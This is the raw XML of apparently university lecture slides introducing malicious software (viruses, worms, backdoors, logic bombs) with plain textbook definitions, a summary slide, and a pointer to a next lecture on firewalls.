            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6516688" y="4076700"/>
            <a:ext cx="2244725" cy="1903413"/>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985090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have considered:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various malicious programs,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trapdoor, logic bomb, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> horse, zombie,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Viruses,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worms,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Countermeasures.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-AU"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517525" y="228600"/>
            <a:ext cx="8583613" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Next Lecture </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53250" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="2133600"/>
            <a:ext cx="7848600" cy="3167063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Firewall..</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="981075"/>
            <a:ext cx="7920038" cy="4752975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="273050" indent="-273050">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="273050" indent="-273050">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="5200" b="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54274" name="Picture 3" descr="hands-up-color.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5003800" y="2708275"/>
            <a:ext cx="3333750" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="6400800"/>
            <a:ext cx="2590800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{DDB28FF9-80B7-4CF1-AD0A-70F5D1BDA8EE}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="DF0029"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="DF0029"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="3600" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="DF0029"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DF0029"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>"It is not the mouse that is the thief,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="3600" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DF0029"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DF0029"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>It is the hole that let the mouse in"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2000" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>                                         Babylonian Talmud, Tractate Baba Metzia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19458" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="4508500"/>
            <a:ext cx="1524000" cy="1300163"/>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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="6813550" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="3900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Malicious Software </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20482" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="1196975"/>
            <a:ext cx="8229600" cy="5165725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Malicious software – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>is software that is intentionally included or inserted in a system for a harmful purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2600" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Virus – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>a virus is a piece of software that can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-AU" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ja-JP" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>infect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-AU" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ja-JP" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> other programs by modifying them; the modification includes a copy of the virus program, which can then go on to infect more programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>usually need a host program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2200" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> – a worm is a program that can replicate itself and send copies from computer to computer across network connections. In addition to propagation, the worm usually performs some unwanted function  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>   (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>usually is a self-contained program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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274" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="7029450" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Malicious Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21506" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1484313"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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2" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="260350"/>
            <a:ext cx="7029450" cy="973138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Backdoors</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="1341438"/>
            <a:ext cx="8135937" cy="4948237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> is also known as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>trapdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>It is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>secret entry point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>into a program that allows those who is aware of the backdoor to gain access, bypassing security procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Programmers used backdoor (legitimately) to debug and test programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Backdoors become threats when left in production programs allowing exploited by attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="7100888" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Logic Bomb</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24578" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1341438"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>One of oldest types of malicious software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Code embedded in legitimate program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Activated when specified conditions met,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>e.g.,  presence/absence of some file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>particular date/time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>particular user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>When triggered, they typically damage system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>modify /delete files (disks), halt machine, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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GUGC">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="808080"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="00CC99"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="000099"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AAE2CA"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="00008A"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000CC"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="B2B2B2"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="GUGC">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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
